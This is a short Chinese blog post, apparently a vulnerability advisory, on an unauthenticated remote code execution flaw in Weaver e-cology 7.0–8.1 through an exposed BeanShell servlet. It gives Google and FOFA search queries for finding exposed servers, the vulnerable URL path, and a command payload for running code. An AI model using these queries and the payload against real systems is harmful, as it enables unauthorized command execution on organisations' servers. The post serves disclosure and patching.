泛微e-cology系统远程代码执行漏洞

泛微协同管理应用平台（e-cology）是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

漏洞源于泛微e-cology系统的JAVA Beanshell接口可被未授权访问，攻击者调用该Beanshell接口，可构造特定的HTTP请求绕过泛微本身的安全限制从而远程命令执行。

漏洞影响版本：

e-cology 7.0

e-cology 8.0

e-cology 8.1

漏洞验证：

第1步：搜索e-cology系统

可通过Google或FOFA进行搜索，Google搜索语法：inurl:"/login/Login.jsp?logintype=1"

FOFA搜索语法：header="ecology_JSessionId"

第2步：访问Beanshell接口

URL路径为：/weaver/bsh.servlet.BshServlet/

第3步：执行Payload

在输入框中输入想要执行的Java代码，如：exec("whoami");

参考链接：
http://www.cnnvd.org.cn/web/bulletin/bulletinById.tag?mkid=160
https://mp.weixin.qq.com/s/vGgFSof6FMRGNPyTzuH2gQ
https://www.weaver.com.cn/cs/securityDownload.asp

标签：管理,漏洞,搜索,Beanshell,cology,泛微,代码执行
来源： https://www.cnblogs.com/dgjnszf/p/11608677.html